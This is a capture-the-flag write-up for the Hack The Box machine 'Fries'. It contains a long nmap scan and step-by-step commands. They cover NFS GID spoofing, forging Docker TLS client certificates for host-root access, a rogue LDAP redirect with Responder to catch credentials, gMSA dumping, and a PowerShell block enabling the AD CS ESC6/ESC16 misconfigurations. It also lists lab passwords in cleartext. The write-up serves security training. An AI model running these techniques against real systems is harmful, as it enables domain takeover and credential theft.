Fries is a hard Active Directory machine on Hack The Box. It involves various techniques such as LDAP enumeration, Kerberos attacks, and SMB exploitation to gain access to the system and escalate privileges to root.
# Nmap 7.95 scan initiated Sat Nov 22 23:58:57 2025 as: /usr/lib/nmap/nmap --privileged -sVC -oN /home/kasemsh/CTF_Machines/fries/nmap/nmap fries.htb
Nmap scan report for fries.htb (10.10.11.96)
Host is up (0.11s latency).
rDNS record for 10.10.11.96: DC01.fries.htb
Scanned at 2025-11-22 23:58:58 IST for 98s
Not shown: 984 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b3:a8:f7:5d:60:e8:66:16:ca:92:f6:76:ba:b8:33:c2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLS2jzf8Eqy8cVa20hyZcem8rwAzeRhrMNEGdSUcFmv1FiQsfR4F9vZYkmfKViGIS3uL3X/6sJjzGxT1F/uPm/U=
| 256 07:ef:11:a6:a0:7d:2b:4d:e8:68:79:1a:7b:a7:a9:cd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFj9hE1zqO6TQ2JpjdgvMm6cr6s6eYsQKWlROV4G6q+4
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Welcome to Fries - Fries Restaurant
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-23 04:59:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fries.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-11-23T05:00:38+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.fries.htb, DNS:fries.htb, DNS:FRIES
| Issuer: commonName=fries-DC01-CA/domainComponent=fries
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-18T05:39:19
| Not valid after: 2105-11-18T05:39:19
| MD5: 2410:a18d:14b3:7f5d:8e34:d144:0bac:6469
| SHA-1: 3e84:1436:bb47:6ccd:f5ee:f805:cacd:47b6:6485:7e09
| -----BEGIN CERTIFICATE-----
| MIIF4zCCBMugAwIBAgITYQAAACgkBIm4DHPMcwABAAAAKDANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRUwEwYKCZImiZPyLGQBGRYFZnJpZXMx
| FjAUBgNVBAMTDWZyaWVzLURDMDEtQ0EwIBcNMjUxMTE4MDUzOTE5WhgPMjEwNTEx
| MTgwNTM5MTlaMAAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPpxCC
| aZWpQqWfYbE5TXkYhqP9hxJvhmYaiPe+peUBqDXSVkdoBGOt600NkzwyjrFZIJLE
| uceFPfxXD1fl1FENc+oEBbyt3EHEovDoJk+cY/45E6fe9C621W+z7bNvKbPxyuXa
| xkxjkxClaIrYHMgk96M6zdvr9AOOiX8UhPqoSeogF8JRuYHmOBImuY2yqr1eRrvH
| LfTfiHPUJR5W6TJ+Fhfz7N7tgo74ddW9WVT3sgvwbbHVUZOpr3XxBQdJRHyzv05Y
| F+KIK3gtn1UMh7pX1NTTIKO3cOiivZCcw+uodamORjrFKloFKpFHJairIDP5MQvG
| +ngp4j7SANPL4KntAgMBAAGjggMOMIIDCjA2BgkrBgEEAYI3FQcEKTAnBh8rBgEE
| AYI3FQiFyocNqsACgomNG8Off4K99k2BAQEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFHdnDz/EL+Qpk3Bq1tnE
| qNe1qcmvMB8GA1UdIwQYMBaAFByH741F57ZStYVlo/TEvDOCG1KcMIHJBgNVHR8E
| gcEwgb4wgbuggbiggbWGgbJsZGFwOi8vL0NOPWZyaWVzLURDMDEtQ0EoMSksQ049
| REMwMSxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vydmlj
| ZXMsQ049Q29uZmlndXJhdGlvbixEQz1mcmllcyxEQz1odGI/Y2VydGlmaWNhdGVS
| ZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBv
| aW50MIG9BggrBgEFBQcBAQSBsDCBrTCBqgYIKwYBBQUHMAKGgZ1sZGFwOi8vL0NO
| PWZyaWVzLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz
| LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9ZnJpZXMsREM9aHRiP2NB
| Q2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9y
| aXR5MC4GA1UdEQEB/wQkMCKCDkRDMDEuZnJpZXMuaHRigglmcmllcy5odGKCBUZS
| SUVTME4GCSsGAQQBgjcZAgRBMD+gPQYKKwYBBAGCNxkCAaAvBC1TLTEtNS0yMS04
| NTgzMzgzNDYtMzg2MTAzMDUxNi0zOTc1MjQwNDcyLTEwMDAwDQYJKoZIhvcNAQEL
| BQADggEBAHaVyk9K3fNRHrh+9cAwXe+jqDqd5iZPSuw6EVABWAdLg9L9r+9bejsO
| Uin7De6fHFHn9EFNM6SJ4fM+g6gnEXwoIuPqmulcE+4zj7U52blMchO/TAFb23HS
| 1bJqvBpy0il8TJfHg6cQs7/F4H5qOOHqTaeciKWnuUR4V3z69mhSMQezkVn7NrbG
| tkH7x05OzZ4slQO3ac3IRkKeRNiD/3gaqmiPEOtHWq11ulKg5ezwvh3fOT9mMCXH
| halJstv6Jh+Xse4ZFHey/dY4/oEqLcwHmnRzmEku2kJ5ND+N0N+oO0jfni6Lg7f5
| LlBoD6A7Z0XQ77rtTrk5tPjER7aq66k=
|_-----END CERTIFICATE-----
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-title: Site does not have a title (text/html;charset=ISO-8859-1).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: F588322AAF157D82BB030AF1EFFD8CF9
| ssl-cert: Subject: commonName=pwm.fries.htb/organizationName=Fries Foods LTD/stateOrProvinceName=Madrid/countryName=SP/emailAddress=web@fries.htb/organizationalUnitName=PWM Configuration/localityName=Madrid
| Issuer: commonName=pwm.fries.htb/organizationName=Fries Foods LTD/stateOrProvinceName=Madrid/countryName=SP/emailAddress=web@fries.htb/organizationalUnitName=PWM Configuration/localityName=Madrid
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-01T22:06:09
| Not valid after: 2026-06-01T22:06:09
| MD5: 118d:ea17:3fba:3b65:28de:8e26:33e7:19f2
| SHA-1: 5503:8aa8:0080:a853:ca73:87e3:b705:3fe8:b599:a855
| -----BEGIN CERTIFICATE-----
| MIIEGTCCAwGgAwIBAgIUW1MfdMXjo8YcnnMWmFQNMkXzkeAwDQYJKoZIhvcNAQEL
| BQAwgZsxCzAJBgNVBAYTAlNQMQ8wDQYDVQQIDAZNYWRyaWQxDzANBgNVBAcMBk1h
| ZHJpZDEYMBYGA1UECgwPRnJpZXMgRm9vZHMgTFREMRowGAYDVQQLDBFQV00gQ29u
| ZmlndXJhdGlvbjEWMBQGA1UEAwwNcHdtLmZyaWVzLmh0YjEcMBoGCSqGSIb3DQEJ
| ARYNd2ViQGZyaWVzLmh0YjAeFw0yNTA2MDEyMjA2MDlaFw0yNjA2MDEyMjA2MDla
| MIGbMQswCQYDVQQGEwJTUDEPMA0GA1UECAwGTWFkcmlkMQ8wDQYDVQQHDAZNYWRy
| aWQxGDAWBgNVBAoMD0ZyaWVzIEZvb2RzIExURDEaMBgGA1UECwwRUFdNIENvbmZp
| Z3VyYXRpb24xFjAUBgNVBAMMDXB3bS5mcmllcy5odGIxHDAaBgkqhkiG9w0BCQEW
| DXdlYkBmcmllcy5odGIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC6
| 5V7dwNSFeKCUGSPuALuZyalQxLProDbZiTVQPJcNj6EmHLG1vxsqXpSrJhCb7dBh
| FiuU36jvy5hbxTgYJ/kXaPO83wAjaTkWe4Dv1cPXTtqyUTx4X9k3W+cU9Rf/Sr4M
| seK3Ub9+2TYaLxRNHwE+eQ+dJQ7/RQOeYZWGc9xEA4nlqwLpT52PCfftdMdZzxzG
| XBhf0TYloX5hLPpFvl/YyZ2foBdbHbODoyXmnvXlboCMlxnpNywyw0pV7DAa4cNk
| 2KZZXzHLvCZ+Ev1+yIt+19J6mFSdHMJjjKSB/fkMuXv2ZN3bTpbVkHz/ruaEG9u7
| MTulepgoLY3XzEKMcq1zAgMBAAGjUzBRMB0GA1UdDgQWBBRaBJosucIruiAxu5z0
| HgysCx0EpDAfBgNVHSMEGDAWgBRaBJosucIruiAxu5z0HgysCx0EpDAPBgNVHRMB
| Af8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAOewUzyifCBtN0FEuDGBX1Z3KY
| ih1AI0wHKhgbDl1HynxsrJ/W2dNtfNzRxDI7sHVN9YSulP+X06ByWwKpehlFbkiM
| DsYhnFsKtlYK/i10hqOynZ18CFvKkvStqfXXgaAQHyL0u12UiOBDM6Jwm/nNKqXx
| Qog6y2Hgi9WCclcYdwyKdiKdeiMz1b4yIIwDiZw01vGo/uyX+nDIsH/6OGbwI0yE
| +ajXRFITQz7FjkcXpqxncpSdDETi5uGse89ebqfnP2TSHRSQSmxmkNO4ZP0Mn9u7
| yQtdyRxIZrJPyWOeB7g3W/xo7BhUKs/tC8lAY3nA4PoDVMh49pyf/JNU8b8F
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|_ http/1.1
| tls-alpn:
|_ http/1.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fries.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.fries.htb, DNS:fries.htb, DNS:FRIES
| Issuer: commonName=fries-DC01-CA/domainComponent=fries
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-18T05:39:19
| Not valid after: 2105-11-18T05:39:19
| MD5: 2410:a18d:14b3:7f5d:8e34:d144:0bac:6469
| SHA-1: 3e84:1436:bb47:6ccd:f5ee:f805:cacd:47b6:6485:7e09
| -----BEGIN CERTIFICATE-----
| MIIF4zCCBMugAwIBAgITYQAAACgkBIm4DHPMcwABAAAAKDANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRUwEwYKCZImiZPyLGQBGRYFZnJpZXMx
| FjAUBgNVBAMTDWZyaWVzLURDMDEtQ0EwIBcNMjUxMTE4MDUzOTE5WhgPMjEwNTEx
| MTgwNTM5MTlaMAAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPpxCC
| aZWpQqWfYbE5TXkYhqP9hxJvhmYaiPe+peUBqDXSVkdoBGOt600NkzwyjrFZIJLE
| uceFPfxXD1fl1FENc+oEBbyt3EHEovDoJk+cY/45E6fe9C621W+z7bNvKbPxyuXa
| xkxjkxClaIrYHMgk96M6zdvr9AOOiX8UhPqoSeogF8JRuYHmOBImuY2yqr1eRrvH
| LfTfiHPUJR5W6TJ+Fhfz7N7tgo74ddW9WVT3sgvwbbHVUZOpr3XxBQdJRHyzv05Y
| F+KIK3gtn1UMh7pX1NTTIKO3cOiivZCcw+uodamORjrFKloFKpFHJairIDP5MQvG
| +ngp4j7SANPL4KntAgMBAAGjggMOMIIDCjA2BgkrBgEEAYI3FQcEKTAnBh8rBgEE
| AYI3FQiFyocNqsACgomNG8Off4K99k2BAQEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFHdnDz/EL+Qpk3Bq1tnE
| qNe1qcmvMB8GA1UdIwQYMBaAFByH741F57ZStYVlo/TEvDOCG1KcMIHJBgNVHR8E
| gcEwgb4wgbuggbiggbWGgbJsZGFwOi8vL0NOPWZyaWVzLURDMDEtQ0EoMSksQ049
| REMwMSxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vydmlj
| ZXMsQ049Q29uZmlndXJhdGlvbixEQz1mcmllcyxEQz1odGI/Y2VydGlmaWNhdGVS
| ZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBv
| aW50MIG9BggrBgEFBQcBAQSBsDCBrTCBqgYIKwYBBQUHMAKGgZ1sZGFwOi8vL0NO
| PWZyaWVzLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz
| LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9ZnJpZXMsREM9aHRiP2NB
| Q2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9y
| aXR5MC4GA1UdEQEB/wQkMCKCDkRDMDEuZnJpZXMuaHRigglmcmllcy5odGKCBUZS
| SUVTME4GCSsGAQQBgjcZAgRBMD+gPQYKKwYBBAGCNxkCAaAvBC1TLTEtNS0yMS04
| NTgzMzgzNDYtMzg2MTAzMDUxNi0zOTc1MjQwNDcyLTEwMDAwDQYJKoZIhvcNAQEL
| BQADggEBAHaVyk9K3fNRHrh+9cAwXe+jqDqd5iZPSuw6EVABWAdLg9L9r+9bejsO
| Uin7De6fHFHn9EFNM6SJ4fM+g6gnEXwoIuPqmulcE+4zj7U52blMchO/TAFb23HS
| 1bJqvBpy0il8TJfHg6cQs7/F4H5qOOHqTaeciKWnuUR4V3z69mhSMQezkVn7NrbG
| tkH7x05OzZ4slQO3ac3IRkKeRNiD/3gaqmiPEOtHWq11ulKg5ezwvh3fOT9mMCXH
| halJstv6Jh+Xse4ZFHey/dY4/oEqLcwHmnRzmEku2kJ5ND+N0N+oO0jfni6Lg7f5
| LlBoD6A7Z0XQ77rtTrk5tPjER7aq66k=
|_-----END CERTIFICATE-----
|_ssl-date: 2025-11-23T05:00:37+00:00; +7h00m01s from scanner time.
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fries.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.fries.htb, DNS:fries.htb, DNS:FRIES
| Issuer: commonName=fries-DC01-CA/domainComponent=fries
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-18T05:39:19
| Not valid after: 2105-11-18T05:39:19
| MD5: 2410:a18d:14b3:7f5d:8e34:d144:0bac:6469
| SHA-1: 3e84:1436:bb47:6ccd:f5ee:f805:cacd:47b6:6485:7e09
| -----BEGIN CERTIFICATE-----
| MIIF4zCCBMugAwIBAgITYQAAACgkBIm4DHPMcwABAAAAKDANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRUwEwYKCZImiZPyLGQBGRYFZnJpZXMx
| FjAUBgNVBAMTDWZyaWVzLURDMDEtQ0EwIBcNMjUxMTE4MDUzOTE5WhgPMjEwNTEx
| MTgwNTM5MTlaMAAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPpxCC
| aZWpQqWfYbE5TXkYhqP9hxJvhmYaiPe+peUBqDXSVkdoBGOt600NkzwyjrFZIJLE
| uceFPfxXD1fl1FENc+oEBbyt3EHEovDoJk+cY/45E6fe9C621W+z7bNvKbPxyuXa
| xkxjkxClaIrYHMgk96M6zdvr9AOOiX8UhPqoSeogF8JRuYHmOBImuY2yqr1eRrvH
| LfTfiHPUJR5W6TJ+Fhfz7N7tgo74ddW9WVT3sgvwbbHVUZOpr3XxBQdJRHyzv05Y
| F+KIK3gtn1UMh7pX1NTTIKO3cOiivZCcw+uodamORjrFKloFKpFHJairIDP5MQvG
| +ngp4j7SANPL4KntAgMBAAGjggMOMIIDCjA2BgkrBgEEAYI3FQcEKTAnBh8rBgEE
| AYI3FQiFyocNqsACgomNG8Off4K99k2BAQEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFHdnDz/EL+Qpk3Bq1tnE
| qNe1qcmvMB8GA1UdIwQYMBaAFByH741F57ZStYVlo/TEvDOCG1KcMIHJBgNVHR8E
| gcEwgb4wgbuggbiggbWGgbJsZGFwOi8vL0NOPWZyaWVzLURDMDEtQ0EoMSksQ049
| REMwMSxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vydmlj
| ZXMsQ049Q29uZmlndXJhdGlvbixEQz1mcmllcyxEQz1odGI/Y2VydGlmaWNhdGVS
| ZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBv
| aW50MIG9BggrBgEFBQcBAQSBsDCBrTCBqgYIKwYBBQUHMAKGgZ1sZGFwOi8vL0NO
| PWZyaWVzLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz
| LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9ZnJpZXMsREM9aHRiP2NB
| Q2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9y
| aXR5MC4GA1UdEQEB/wQkMCKCDkRDMDEuZnJpZXMuaHRigglmcmllcy5odGKCBUZS
| SUVTME4GCSsGAQQBgjcZAgRBMD+gPQYKKwYBBAGCNxkCAaAvBC1TLTEtNS0yMS04
| NTgzMzgzNDYtMzg2MTAzMDUxNi0zOTc1MjQwNDcyLTEwMDAwDQYJKoZIhvcNAQEL
| BQADggEBAHaVyk9K3fNRHrh+9cAwXe+jqDqd5iZPSuw6EVABWAdLg9L9r+9bejsO
| Uin7De6fHFHn9EFNM6SJ4fM+g6gnEXwoIuPqmulcE+4zj7U52blMchO/TAFb23HS
| 1bJqvBpy0il8TJfHg6cQs7/F4H5qOOHqTaeciKWnuUR4V3z69mhSMQezkVn7NrbG
| tkH7x05OzZ4slQO3ac3IRkKeRNiD/3gaqmiPEOtHWq11ulKg5ezwvh3fOT9mMCXH
| halJstv6Jh+Xse4ZFHey/dY4/oEqLcwHmnRzmEku2kJ5ND+N0N+oO0jfni6Lg7f5
| LlBoD6A7Z0XQ77rtTrk5tPjER7aq66k=
|_-----END CERTIFICATE-----
|_ssl-date: 2025-11-23T05:00:38+00:00; +7h00m02s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fries.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-11-23T05:00:37+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.fries.htb, DNS:fries.htb, DNS:FRIES
| Issuer: commonName=fries-DC01-CA/domainComponent=fries
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-18T05:39:19
| Not valid after: 2105-11-18T05:39:19
| MD5: 2410:a18d:14b3:7f5d:8e34:d144:0bac:6469
| SHA-1: 3e84:1436:bb47:6ccd:f5ee:f805:cacd:47b6:6485:7e09
| -----BEGIN CERTIFICATE-----
| MIIF4zCCBMugAwIBAgITYQAAACgkBIm4DHPMcwABAAAAKDANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRUwEwYKCZImiZPyLGQBGRYFZnJpZXMx
| FjAUBgNVBAMTDWZyaWVzLURDMDEtQ0EwIBcNMjUxMTE4MDUzOTE5WhgPMjEwNTEx
| MTgwNTM5MTlaMAAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPpxCC
| aZWpQqWfYbE5TXkYhqP9hxJvhmYaiPe+peUBqDXSVkdoBGOt600NkzwyjrFZIJLE
| uceFPfxXD1fl1FENc+oEBbyt3EHEovDoJk+cY/45E6fe9C621W+z7bNvKbPxyuXa
| xkxjkxClaIrYHMgk96M6zdvr9AOOiX8UhPqoSeogF8JRuYHmOBImuY2yqr1eRrvH
| LfTfiHPUJR5W6TJ+Fhfz7N7tgo74ddW9WVT3sgvwbbHVUZOpr3XxBQdJRHyzv05Y
| F+KIK3gtn1UMh7pX1NTTIKO3cOiivZCcw+uodamORjrFKloFKpFHJairIDP5MQvG
| +ngp4j7SANPL4KntAgMBAAGjggMOMIIDCjA2BgkrBgEEAYI3FQcEKTAnBh8rBgEE
| AYI3FQiFyocNqsACgomNG8Off4K99k2BAQEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFHdnDz/EL+Qpk3Bq1tnE
| qNe1qcmvMB8GA1UdIwQYMBaAFByH741F57ZStYVlo/TEvDOCG1KcMIHJBgNVHR8E
| gcEwgb4wgbuggbiggbWGgbJsZGFwOi8vL0NOPWZyaWVzLURDMDEtQ0EoMSksQ049
| REMwMSxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vydmlj
| ZXMsQ049Q29uZmlndXJhdGlvbixEQz1mcmllcyxEQz1odGI/Y2VydGlmaWNhdGVS
| ZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBv
| aW50MIG9BggrBgEFBQcBAQSBsDCBrTCBqgYIKwYBBQUHMAKGgZ1sZGFwOi8vL0NO
| PWZyaWVzLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz
| LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9ZnJpZXMsREM9aHRiP2NB
| Q2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9y
| aXR5MC4GA1UdEQEB/wQkMCKCDkRDMDEuZnJpZXMuaHRigglmcmllcy5odGKCBUZS
| SUVTME4GCSsGAQQBgjcZAgRBMD+gPQYKKwYBBAGCNxkCAaAvBC1TLTEtNS0yMS04
| NTgzMzgzNDYtMzg2MTAzMDUxNi0zOTc1MjQwNDcyLTEwMDAwDQYJKoZIhvcNAQEL
| BQADggEBAHaVyk9K3fNRHrh+9cAwXe+jqDqd5iZPSuw6EVABWAdLg9L9r+9bejsO
| Uin7De6fHFHn9EFNM6SJ4fM+g6gnEXwoIuPqmulcE+4zj7U52blMchO/TAFb23HS
| 1bJqvBpy0il8TJfHg6cQs7/F4H5qOOHqTaeciKWnuUR4V3z69mhSMQezkVn7NrbG
| tkH7x05OzZ4slQO3ac3IRkKeRNiD/3gaqmiPEOtHWq11ulKg5ezwvh3fOT9mMCXH
| halJstv6Jh+Xse4ZFHey/dY4/oEqLcwHmnRzmEku2kJ5ND+N0N+oO0jfni6Lg7f5
| LlBoD6A7Z0XQ77rtTrk5tPjER7aq66k=
|_-----END CERTIFICATE-----
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 46245/tcp): CLEAN (Timeout)
| Check 2 (port 47430/tcp): CLEAN (Timeout)
| Check 3 (port 23943/udp): CLEAN (Timeout)
| Check 4 (port 21385/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
| smb2-time:
| date: 2025-11-23T04:59:56
|_ start_date: N/A
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 23 00:00:36 2025 -- 1 IP address (1 host up) scanned in 98.86 seconds
sudo echo -e '\n10.10.11.96 DC01.fries.htb fries.htb DC01 pwm.fries.htb code.fries.htb db-mgmt05.fries.htb' | sudo tee -a /etc/hosts
accessing Gitea with the credentials we already provided with Username:d.cooper@fries.htb Password:D4LE11maan!!

discovery of new subdomain db-mgmt05.fries.htb

we have potential usernames svc, dale


postgresql credentials Username: root Password: PsqLR00tpaSS11

navigating to db-mgmt05.fries.htb login we our credentials we see version and its running in python

at this time only Metasploit framework have working exploit available

looking at the environment variables we have Password: Friesf00Ds2025!!

SSH into svc@web with Friesf00Ds2025!!

we have NFS running


we pivot so we mount in on attacker machine

we mount the directory
sudo mount -t nfs 192.168.100.2:/srv/web.fries.htb mount
we cant access certs folder its owned by this guid 59605603

what we can do is create a user and change its guid id to 59605603 and access it
# 1 add user
sudo adduser rand
# 2 change guid for the user rand
sudo vi /etc/passwd
rand:x:1002:59605603:,,,:/home/rand:/bin/bash
# switch to rand user
su rand
# 3 move all to /dev/shm
cp * /dev/shm/

we zip the certificates
zip certs.zip ca.pem ca-key.pem server-openssl.cnf

then we uploading the zip to svc@web machine

docker daemon is on port 2376

change the CN = fries to CN = root

Q: How can a non-privileged user interact with Docker without being in the docker group?
A: If the Docker daemon is configured to listen on a TCP socket (e.g., 127.0.0.1:2375) with TLS mutual authentication enabled, any user who possesses a valid client certificate signed by the Docker CA can authenticate to the Docker API over TLS—bypassing the need for Unix socket access or docker group membership.
[Docker Socket Security: A Critical Vulnerability Guide][https://medium.com/@instatunnel/docker-socket-security-a-critical-vulnerability-guide-76f4137a68c5]
openssl genrsa -out root.key 2048
openssl req -new -key root.key -out root.csr -config server-openssl.cnf
openssl x509 -req -in root.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out root-cert.pem -days 365 -sha256 -extensions req_ext -extfile server-openssl.cnf
mv root-cert.pem cert.pem
mv root.key key.pem
chmod 600 key.pem
export DOCKER_HOST=tcp://127.0.0.1:2376
export DOCKER_TLS_VERIFY=1
export DOCKER_CERT_PATH=/home/svc/.docker

# List available images
docker images
# mount Image on local storage
docker run -it --privileged -v /:/host --entrypoint /bin/bash IMAGE_ID
# user flag
cat /host/root/user.txt

cat /host/root/scripts/pwm/config/PwmConfiguration.xml | grep "\$2y"

crack the hash rockon!
on pwm.fries.htb open Configuration Editor and enter the password

# run Responder to capture the password
sudo responder -I tun0
navigate to LDAP –> LDAP Directories –> Default –> Connections we edit the LDAP URLs to attacker IP ldap://10.10.x.x:389 and click on Test LDAP Profile
and we get a password of svc_infra m6tneOMAh5p0wQ0d


python3 gMSADumper.py -d fries.htb -u 'svc_infra' -p '<PASSWORD>'


certipy-ad find -u 'gMSA_CA_prod$' -hashes '<HASH>' -dc-ip 10.10.11.96 -vulnerable -enabled

Q: How was this misconfiguration detected?
A: Using Certify we enumerated CA permissions and observed that FRIES.HTB\gMSA_CA_prod was listed under ManageCa. Certify also flagged the presence of ESC7—a vulnerability category covering dangerous CA-level permissions that enable ESC6/ESC16 abuse
evil-winrm -i fries.htb -u 'gMSA_CA_prod$' -H '<HASH>'

# Create CA admin COM object
$CA = New-Object -ComObject CertificateAuthority.Admin
$Config = "DC01.fries.htb\fries-DC01-CA"
# --- ESC6: Enable EDITF_ATTRIBUTESUBJECTALTNAME2 ---
$current = $CA.GetConfigEntry($Config, "PolicyModules\CertificateAuthority_MicrosoftDefault.Policy", "EditFlags")
Write-Host "Current EditFlags: $current"
$new = $current -bor 0x00040000
Write-Host "New EditFlags: $new"
$CA.SetConfigEntry($Config, "PolicyModules\CertificateAuthority_MicrosoftDefault.Policy", "EditFlags", $new)
# --- ESC16: Disable NTDS CA Security Extension ---
$CA.SetConfigEntry($Config, "PolicyModules\CertificateAuthority_MicrosoftDefault.Policy", "DisableExtensionList", "1.3.6.1.4.1.311.25.2")
# Restart Certificate Services (once is enough)
